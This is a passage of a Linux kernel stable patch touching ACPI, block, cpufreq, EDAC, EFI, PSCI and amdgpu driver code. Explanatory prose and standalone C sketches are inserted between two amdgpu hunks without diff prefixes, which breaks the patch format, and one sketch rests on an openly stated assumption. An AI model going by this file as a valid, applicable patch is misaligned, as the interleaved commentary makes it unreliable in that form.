+ 		return FIND_CHILD_MIN_SCORE;
++	}
+ 
+ 	if (ACPI_FAILURE(status) || !(sta & ACPI_STA_DEVICE_ENABLED))
+ 		return -ENODEV;
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index b47e93a24a9a4..dbfa58e799e28 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1370,9 +1370,12 @@ static void acpi_set_pnp_ids(acpi_handle handle, struct acpi_device_pnp *pnp,
+ 		 * Some devices don't reliably have _HIDs & _CIDs, so add
+ 		 * synthetic HIDs to make sure drivers can find them.
+ 		 */
+-		if (acpi_is_video_device(handle))
++		if (acpi_is_video_device(handle)) {
+ 			acpi_add_id(pnp, ACPI_VIDEO_HID);
+-		else if (acpi_bay_match(handle))
++			pnp->type.backlight = 1;
++			break;
++		}
++		if (acpi_bay_match(handle))
+ 			acpi_add_id(pnp, ACPI_BAY_HID);
+ 		else if (acpi_dock_match(handle))
+ 			acpi_add_id(pnp, ACPI_DOCK_HID);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 76b7e7f8894e7..1db8e68cd8bce 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -50,6 +50,10 @@ static void acpi_video_parse_cmdline(void)
+ 		acpi_backlight_cmdline = acpi_backlight_video;
+ 	if (!strcmp("native", acpi_video_backlight_string))
+ 		acpi_backlight_cmdline = acpi_backlight_native;
++	if (!strcmp("nvidia_wmi_ec", acpi_video_backlight_string))
++		acpi_backlight_cmdline = acpi_backlight_nvidia_wmi_ec;
++	if (!strcmp("apple_gmux", acpi_video_backlight_string))
++		acpi_backlight_cmdline = acpi_backlight_apple_gmux;
+ 	if (!strcmp("none", acpi_video_backlight_string))
+ 		acpi_backlight_cmdline = acpi_backlight_none;
+ }
+diff --git a/drivers/block/drbd/drbd_req.c b/drivers/block/drbd/drbd_req.c
+index 7f9bcc82fc9c4..d700bf06b534f 100644
+--- a/drivers/block/drbd/drbd_req.c
++++ b/drivers/block/drbd/drbd_req.c
+@@ -1607,6 +1607,8 @@ void drbd_submit_bio(struct bio *bio)
+ 	struct drbd_device *device = bio->bi_bdev->bd_disk->private_data;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	/*
+ 	 * what we "blindly" assume:
+diff --git a/drivers/block/ps3vram.c b/drivers/block/ps3vram.c
+index c76e0148eada3..574e470b220b0 100644
+--- a/drivers/block/ps3vram.c
++++ b/drivers/block/ps3vram.c
+@@ -587,6 +587,8 @@ static void ps3vram_submit_bio(struct bio *bio)
+ 	dev_dbg(&dev->core, "%s\n", __func__);
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	spin_lock_irq(&priv->lock);
+ 	busy = !bio_list_empty(&priv->list);
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 204e39006dda8..c17bd845f5fcb 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -307,6 +307,7 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 		max_perf = min_perf;
+ 
+ 	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, true);
++	cpufreq_cpu_put(policy);
+ }
+ 
+ static int amd_get_min_freq(struct amd_cpudata *cpudata)
+diff --git a/drivers/edac/edac_device.c b/drivers/edac/edac_device.c
+index 19522c568aa5d..878deb4880cdb 100644
+--- a/drivers/edac/edac_device.c
++++ b/drivers/edac/edac_device.c
+@@ -394,17 +394,16 @@ static void edac_device_workq_teardown(struct edac_device_ctl_info *edac_dev)
+  *	Then restart the workq on the new delay
+  */
+ void edac_device_reset_delay_period(struct edac_device_ctl_info *edac_dev,
+-					unsigned long value)
++				    unsigned long msec)
+ {
+-	unsigned long jiffs = msecs_to_jiffies(value);
+-
+-	if (value == 1000)
+-		jiffs = round_jiffies_relative(value);
+-
+-	edac_dev->poll_msec = value;
+-	edac_dev->delay	    = jiffs;
++	edac_dev->poll_msec = msec;
++	edac_dev->delay	    = msecs_to_jiffies(msec);
+ 
+-	edac_mod_work(&edac_dev->work, jiffs);
++	/* See comment in edac_device_workq_setup() above */
++	if (edac_dev->poll_msec == 1000)
++		edac_mod_work(&edac_dev->work, round_jiffies_relative(edac_dev->delay));
++	else
++		edac_mod_work(&edac_dev->work, edac_dev->delay);
+ }
+ 
+ int edac_device_alloc_index(void)
+diff --git a/drivers/edac/edac_module.h b/drivers/edac/edac_module.h
+index 50ed9f2425bb5..4ed24d664d83b 100644
+--- a/drivers/edac/edac_module.h
++++ b/drivers/edac/edac_module.h
+@@ -52,7 +52,7 @@ bool edac_stop_work(struct delayed_work *work);
+ bool edac_mod_work(struct delayed_work *work, unsigned long delay);
+ 
+ extern void edac_device_reset_delay_period(struct edac_device_ctl_info
+-					   *edac_dev, unsigned long value);
++					   *edac_dev, unsigned long msec);
+ extern void edac_mc_reset_delay_period(unsigned long value);
+ 
+ /*
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index f12cc29bd4b84..033aac6be7daa 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -374,8 +374,8 @@ static int __init efisubsys_init(void)
+ 	efi_kobj = kobject_create_and_add("efi", firmware_kobj);
+ 	if (!efi_kobj) {
+ 		pr_err("efi: Firmware registration failed.\n");
+-		destroy_workqueue(efi_rts_wq);
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto err_destroy_wq;
+ 	}
+ 
+ 	if (efi_rt_services_supported(EFI_RT_SUPPORTED_GET_VARIABLE |
+@@ -423,7 +423,10 @@ err_unregister:
+ 		generic_ops_unregister();
+ err_put:
+ 	kobject_put(efi_kobj);
+-	destroy_workqueue(efi_rts_wq);
++err_destroy_wq:
++	if (efi_rts_wq)
++		destroy_workqueue(efi_rts_wq);
++
+ 	return error;
+ }
+ 
+diff --git a/drivers/firmware/efi/runtime-wrappers.c b/drivers/firmware/efi/runtime-wrappers.c
+index f3e54f6616f02..60075e0e4943a 100644
+--- a/drivers/firmware/efi/runtime-wrappers.c
++++ b/drivers/firmware/efi/runtime-wrappers.c
+@@ -62,6 +62,7 @@ struct efi_runtime_work efi_rts_work;
+ 									\
+ 	if (!efi_enabled(EFI_RUNTIME_SERVICES)) {			\
+ 		pr_warn_once("EFI Runtime Services are disabled!\n");	\
++		efi_rts_work.status = EFI_DEVICE_ERROR;			\
+ 		goto exit;						\
+ 	}								\
+ 									\
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index e7bcfca4159f6..447ee4ea5c903 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -440,6 +440,9 @@ static const struct file_operations psci_debugfs_ops = {
+ 
+ static int __init psci_debugfs_init(void)
+ {
++	if (!invoke_psci_fn || !psci_ops.get_version)
++		return 0;
++
+ 	return PTR_ERR_OR_ZERO(debugfs_create_file("psci", 0444, NULL, NULL,
+ 						   &psci_debugfs_ops));
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 0be85d19a6f3e..8f83d5b6ceaad 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -36,6 +36,7 @@
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
+ 
++#include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_probe_helper.h>
+ #include <drm/amdgpu_drm.h>
+@@ -89,6 +90,8 @@ MODULE_FIRMWARE("amdgpu/navi12_gpu_info.bin");
+ #define AMDGPU_MAX_RETRY_LIMIT		2
+ #define AMDGPU_RETRY_SRIOV_RESET(r) ((r) == -EBUSY || (r) == -ETIMEDOUT || (r) == -EINVAL)
+ 
++static const struct drm_driver amdgpu_kms_driver;
++
+ const char *amdgpu_asic_name[] = {
+ 	"TAHITI",
+ 	"PITCAIRN",
+@@ -3677,6 +3680,11 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	if (r)
+ 		return r;
+ 
++	/* Get rid of things like offb */
++	r = drm_aperture_remove_conflicting_pci_framebuffers(adev->pdev, &amdgpu_kms_driver);
++	if (r)
++		return r;
++
+ 	/* Enable TMZ based on IP_VERSION */
+ 	amdgpu_gmc_tmz_set(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b59466972ed7a..2e5d78b6635c4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -23,7 +23,6 @@
+  */
+ 
+ #include <drm/amdgpu_drm.h>
+-#include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
+ #include <drm/drm_gem.h>
+ #include <drm/drm_vblank.h>
+@@ -2123,11 +2122,6 @@ static int amdgpu_pci_probe(struct pci_dev *pdev,
+ 	}
+ #endif
+ 
+-	/* Get rid of things like offb */
+-	ret = drm_aperture_remove_conflicting_pci_framebuffers(pdev, &amdgpu_kms_driver);
+-	if (ret)
+-		return ret;
+-
+ 	adev = devm_drm_dev_alloc(&pdev->dev, &amdgpu_kms_driver, typeof(*adev), ddev);
+ 	if (IS_ERR(adev))
+ 		return PTR_ERR(adev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 3be3cba3a16db..cfd78c4a45baa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -468,8 +468,9 @@ static bool amdgpu_bo_validate_size(struct amdgpu_device *adev,
+ 	return true;
+ 
+ fail:
+-	DRM_DEBUG("BO size %lu > total memory in domain: %llu\n", size,
+-		  man->size);
++	if (man)
++		DRM_DEBUG("BO size %lu > total memory in domain: %llu\n", size,
++			  man->size);
+ 	return false;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+index 80dd1343594c7..75c80c557b6ec 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c
+@@ -882,7 +882,7 @@ void amdgpu_vram_mgr_fini(struct amdgpu_device *adev)
+ 		kfree(rsv);
+ 
+ 	list_for_each_entry_safe(rsv, temp, &mgr->reserved_pages, blocks) {
+-		drm_buddy_free_list(&mgr->mm, &rsv->blocks);
++		drm_buddy_free_list(&mgr->mm, &rsv->allocated);
+ 		kfree(rsv);
+ 	}
+ 	drm_buddy_fini(&mgr->mm);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 8b297ade69a24..909cf9f220c19 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -322,6 +322,7 @@ soc21_asic_reset_method(struct amdgpu_device *adev)
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
+ 	case IP_VERSION(13, 0, 0):
+ 	case IP_VERSION(13, 0, 7):
++	case IP_VERSION(13, 0, 10):
+ 		return AMD_RESET_METHOD_MODE1;
+ 	case IP_VERSION(13, 0, 4):
+ 		return AMD_RESET_METHOD_MODE2;
+@@ -652,6 +653,16 @@ static int soc21_common_early_init(void *handle)
+ 		}
+ 		adev->external_rev_id = adev->rev_id + 0x20;
+ 		break;
++	case IP_VERSION(11, 0, 4):
++		adev->cg_flags = AMD_CG_SUPPORT_VCN_MGCG |
++			AMD_CG_SUPPORT_JPEG_MGCG;
++		adev->pg_flags = AMD_PG_SUPPORT_VCN |
++			AMD_PG_SUPPORT_VCN_DPG |
++			AMD_PG_SUPPORT_GFX_PG |
++			AMD_PG_SUPPORT_JPEG;
++		adev->external_rev_id = adev->rev_id + 0x1;
++		break;
++
+ 	default:
+ 		/* FIXME: not supported yet */
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 33ab6fdc36175..9919c39f7ea03 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1919,8 +1919,9 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.src.gpuvm = true;
+-		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+-		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
++		DC_FP_START();
++		dcn32_zero_pipe_dcc_fraction(pipes, pipe_cnt);
++		DC_FP_END();
+ 		pipes[pipe_cnt].pipe.dest.vfront_porch = timing->v_front_porch;
+ 		pipes[pipe_cnt].pipe.src.gpuvm_min_page_size_kbytes = 256; // according to spreadsheet
+ 		pipes[pipe_cnt].pipe.src.unbounded_req_mode = false;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index d1bf49d207de4..d90216d2fe3a8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -2546,3 +2546,11 @@ void dcn32_update_bw_bounding_box_fpu(struct dc *dc, struct clk_bw_params *bw_pa
+ 	}
+ }
+ 
++void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
++				  int pipe_cnt)
++{
++	dc_assert_fp_enabled();
++
++	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
++	pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
+index 3a3dc2ce4c739..ab010e7e840b8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.h
+@@ -73,4 +73,7 @@ int dcn32_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 
+ void dcn32_patch_dpm_table(struct clk_bw_params *bw_params);
+ 
++void dcn32_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
++				  int pipe_cnt);
++
+ #endif
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+index dad3e3741a4e8..190af79f3236f 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_thermal.c
+@@ -67,22 +67,21 @@ int vega10_fan_ctrl_get_fan_speed_info(struct pp_hwmgr *hwmgr,
+ int vega10_fan_ctrl_get_fan_speed_pwm(struct pp_hwmgr *hwmgr,
+ 		uint32_t *speed)
+ {
+-	uint32_t current_rpm;
+-	uint32_t percent = 0;
+-
+-	if (hwmgr->thermal_controller.fanInfo.bNoFan)
+-		return 0;
++	struct amdgpu_device *adev = hwmgr->adev;
++	uint32_t duty100, duty;
++	uint64_t tmp64;
+ 
+-	if (vega10_get_current_rpm(hwmgr, &current_rpm))
+-		return -1;
++	duty100 = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_FDO_CTRL1),
++				CG_FDO_CTRL1, FMAX_DUTY100);
++	duty = REG_GET_FIELD(RREG32_SOC15(THM, 0, mmCG_THERMAL_STATUS),
++				CG_THERMAL_STATUS, FDO_PWM_DUTY);
+ 
+-	if (hwmgr->thermal_controller.
+-			advanceFanControlParameters.usMaxFanRPM != 0)
+-		percent = current_rpm * 255 /
+-			hwmgr->thermal_controller.
+-			advanceFanControlParameters.usMaxFanRPM;
++	if (!duty100)
++		return -EINVAL;
+ 
+-	*speed = MIN(percent, 255);
++	tmp64 = (uint64_t)duty * 255;
++	do_div(tmp64, duty100);
++	*speed = MIN((uint32_t)tmp64, 255);
+ 
+ 	return 0;
+ }
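
The replacement reads the fan duty cycle straight from the FDO registers and scales it to the 0..255 PWM range, instead of deriving a percentage from RPM. A sketch of just the arithmetic, assuming a 64-bit intermediate to avoid overflow the way do_div() is used above:

    #include <stdint.h>
    #include <stdio.h>

    static int fan_pwm_from_duty(uint32_t duty, uint32_t duty100, uint32_t *speed)
    {
        uint64_t tmp;

        if (!duty100)
            return -1;                 /* -EINVAL in the kernel */

        tmp = (uint64_t)duty * 255;    /* widen before multiplying */
        tmp /= duty100;                /* do_div(tmp, duty100) */
        *speed = tmp < 255 ? (uint32_t)tmp : 255;
        return 0;
    }

    int main(void)
    {
        uint32_t speed;

        if (!fan_pwm_from_duty(128, 255, &speed))
            printf("pwm = %u\n", speed);  /* prints pwm = 128 */
        return 0;
    }
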
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+index f816b1dd110ee..44bbf17e4bef1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/amdgpu_smu.h
+@@ -568,6 +568,10 @@ struct smu_context
+ 	u32 param_reg;
+ 	u32 msg_reg;
+ 	u32 resp_reg;
++
++	u32 debug_param_reg;
++	u32 debug_msg_reg;
++	u32 debug_resp_reg;
+ };
+ 
+ struct i2c_adapter;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
+index 9ebb8f39732a0..8b8266890a100 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu_v13_0_0_ppsmc.h
+@@ -131,7 +131,13 @@
+ #define PPSMC_MSG_EnableAudioStutterWA           0x44
+ #define PPSMC_MSG_PowerUpUmsch                   0x45
+ #define PPSMC_MSG_PowerDownUmsch                 0x46
+-#define PPSMC_Message_Count                      0x47
++#define PPSMC_MSG_SetDcsArch                     0x47
++#define PPSMC_MSG_TriggerVFFLR                   0x48
++#define PPSMC_MSG_SetNumBadMemoryPagesRetired    0x49
++#define PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel 0x4A
++#define PPSMC_MSG_SetPriorityDeltaGain           0x4B
++#define PPSMC_MSG_AllowIHHostInterrupt           0x4C
++#define PPSMC_Message_Count                      0x4D
+ 
+ //Debug Dump Message
+ #define DEBUGSMC_MSG_TestMessage                    0x1
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
+index 58098b82df660..4180c71d930f1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_types.h
+@@ -239,7 +239,10 @@
+ 	__SMU_DUMMY_MAP(DriverMode2Reset), \
+ 	__SMU_DUMMY_MAP(GetGfxOffStatus),		 \
+ 	__SMU_DUMMY_MAP(GetGfxOffEntryCount),		 \
+-	__SMU_DUMMY_MAP(LogGfxOffResidency),
++	__SMU_DUMMY_MAP(LogGfxOffResidency),			\
++	__SMU_DUMMY_MAP(SetNumBadMemoryPagesRetired),		\
++	__SMU_DUMMY_MAP(SetBadMemoryPagesRetiredFlagsPerChannel), \
++	__SMU_DUMMY_MAP(AllowGpo),
+ 
+ #undef __SMU_DUMMY_MAP
+ #define __SMU_DUMMY_MAP(type)	SMU_MSG_##type
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index a9122b3b15322..e8c6febb8b64e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -273,6 +273,9 @@ int smu_v13_0_init_pptable_microcode(struct smu_context *smu);
+ 
+ int smu_v13_0_run_btc(struct smu_context *smu);
+ 
++int smu_v13_0_gpo_control(struct smu_context *smu,
++			  bool enablement);
++
+ int smu_v13_0_deep_sleep_control(struct smu_context *smu,
+ 				 bool enablement);
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 8e4830a311bde..9f9f64c5cdd88 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -1258,7 +1258,8 @@ int smu_v13_0_set_fan_speed_rpm(struct smu_context *smu,
+ 				uint32_t speed)
+ {
+ 	struct amdgpu_device *adev = smu->adev;
+-	uint32_t tach_period, crystal_clock_freq;
++	uint32_t crystal_clock_freq = 2500;
++	uint32_t tach_period;
+ 	int ret;
+ 
+ 	if (!speed)
+@@ -1268,7 +1269,6 @@ int smu_v13_0_set_fan_speed_rpm(struct smu_context *smu,
+ 	if (ret)
+ 		return ret;
+ 
+-	crystal_clock_freq = amdgpu_asic_get_xclk(adev);
+ 	tach_period = 60 * crystal_clock_freq * 10000 / (8 * speed);
+ 	WREG32_SOC15(THM, 0, regCG_TACH_CTRL,
+ 		     REG_SET_FIELD(RREG32_SOC15(THM, 0, regCG_TACH_CTRL),
+@@ -2148,6 +2148,21 @@ int smu_v13_0_run_btc(struct smu_context *smu)
+ 	return res;
+ }
+ 
++int smu_v13_0_gpo_control(struct smu_context *smu,
++			  bool enablement)
++{
++	int res;
++
++	res = smu_cmn_send_smc_msg_with_param(smu,
++					      SMU_MSG_AllowGpo,
++					      enablement ? 1 : 0,
++					      NULL);
++	if (res)
++		dev_err(smu->adev->dev, "SetGpoAllow %d failed!\n", enablement);
++
++	return res;
++}
++
+ int smu_v13_0_deep_sleep_control(struct smu_context *smu,
+ 				 bool enablement)
+ {
+@@ -2249,6 +2264,10 @@ bool smu_v13_0_baco_is_support(struct smu_context *smu)
+ 	    !smu_baco->platform_support)
+ 		return false;
+ 
++	/* return true if ASIC is in BACO state already */
++	if (smu_v13_0_baco_get_state(smu) == SMU_BACO_STATE_ENTER)
++		return true;
++
+ 	if (smu_cmn_feature_is_supported(smu, SMU_FEATURE_BACO_BIT) &&
+ 	    !smu_cmn_feature_is_enabled(smu, SMU_FEATURE_BACO_BIT))
+ 		return false;
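
The fan-speed hunk pins the reference clock at 2500 rather than querying amdgpu_asic_get_xclk(), and the tach period follows from the requested RPM. A small model of the computation (reading 2500 as a 25 MHz crystal in 10 kHz units is an assumption):

    #include <stdint.h>
    #include <stdio.h>

    static int fan_tach_period(uint32_t rpm, uint32_t *period)
    {
        const uint32_t crystal_clock_freq = 2500;

        if (!rpm)
            return -1;   /* the kernel returns early when speed == 0 */

        /* 60 * 2500 * 10000 = 1.5e9, still within 32 bits */
        *period = 60 * crystal_clock_freq * 10000 / (8 * rpm);
        return 0;
    }

    int main(void)
    {
        uint32_t period;

        if (!fan_tach_period(1500, &period))
            printf("tach_period = %u\n", period);  /* 125000 */
        return 0;
    }
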
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index b8430601304f0..4c20d17e7416e 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -70,6 +70,26 @@
+ 
+ #define MP0_MP1_DATA_REGION_SIZE_COMBOPPTABLE	0x4000
+ 
++#define mmMP1_SMN_C2PMSG_66                                                                            0x0282
++#define mmMP1_SMN_C2PMSG_66_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_82                                                                            0x0292
++#define mmMP1_SMN_C2PMSG_82_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_90                                                                            0x029a
++#define mmMP1_SMN_C2PMSG_90_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_75                                                                            0x028b
++#define mmMP1_SMN_C2PMSG_75_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_53                                                                            0x0275
++#define mmMP1_SMN_C2PMSG_53_BASE_IDX                                                                   0
++
++#define mmMP1_SMN_C2PMSG_54                                                                            0x0276
++#define mmMP1_SMN_C2PMSG_54_BASE_IDX                                                                   0
++
++#define DEBUGSMC_MSG_Mode1Reset	2
++
+ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] = {
+ 	MSG_MAP(TestMessage,			PPSMC_MSG_TestMessage,                 1),
+ 	MSG_MAP(GetSmuVersion,			PPSMC_MSG_GetSmuVersion,               1),
+@@ -121,6 +141,10 @@ static struct cmn2asic_msg_mapping smu_v13_0_0_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(PrepareMp1ForUnload,		PPSMC_MSG_PrepareMp1ForUnload,         0),
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
++	MSG_MAP(SetNumBadMemoryPagesRetired,	PPSMC_MSG_SetNumBadMemoryPagesRetired,   0),
++	MSG_MAP(SetBadMemoryPagesRetiredFlagsPerChannel,
++			    PPSMC_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,   0),
++	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_clk_map[SMU_CLK_COUNT] = {
+@@ -189,6 +213,7 @@ static struct cmn2asic_mapping smu_v13_0_0_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(SOC_PCC),
+ 	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ 	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_PPT_BIT] = {1, FEATURE_THROTTLERS_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_table_map[SMU_TABLE_COUNT] = {
+@@ -1878,6 +1903,69 @@ static int smu_v13_0_0_set_df_cstate(struct smu_context *smu,
+ 					       NULL);
+ }
+ 
++static int smu_v13_0_0_mode1_reset(struct smu_context *smu)
++{
++	int ret;
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 10))
++		ret = smu_cmn_send_debug_smc_msg(smu, DEBUGSMC_MSG_Mode1Reset);
++	else
++		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_Mode1Reset, NULL);
++
++	if (!ret)
++		msleep(SMU13_MODE1_RESET_WAIT_TIME_IN_MS);
++
++	return ret;
++}
++
++static void smu_v13_0_0_set_smu_mailbox_registers(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	smu->param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_82);
++	smu->msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_66);
++	smu->resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_90);
++
++	smu->debug_param_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_53);
++	smu->debug_msg_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_75);
++	smu->debug_resp_reg = SOC15_REG_OFFSET(MP1, 0, mmMP1_SMN_C2PMSG_54);
++}
++
++static int smu_v13_0_0_smu_send_bad_mem_page_num(struct smu_context *smu,
++		uint32_t size)
++{
++	int ret = 0;
++
++	/* message SMU to update the bad page number on SMUBUS */
++	ret = smu_cmn_send_smc_msg_with_param(smu,
++					  SMU_MSG_SetNumBadMemoryPagesRetired,
++					  size, NULL);
++	if (ret)
++		dev_err(smu->adev->dev,
++			  "[%s] failed to message SMU to update bad memory pages number\n",
++			  __func__);
++
++	return ret;
++}
++
++static int smu_v13_0_0_send_bad_mem_channel_flag(struct smu_context *smu,
++		uint32_t size)
++{
++	int ret = 0;
++
++	/* message SMU to update the bad channel info on SMUBUS */
++	ret = smu_cmn_send_smc_msg_with_param(smu,
++				  SMU_MSG_SetBadMemoryPagesRetiredFlagsPerChannel,
++				  size, NULL);
++	if (ret)
++		dev_err(smu->adev->dev,
++			  "[%s] failed to message SMU to update bad memory pages channel info\n",
++			  __func__);
++
++	return ret;
++}
++
+ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.get_allowed_feature_mask = smu_v13_0_0_get_allowed_feature_mask,
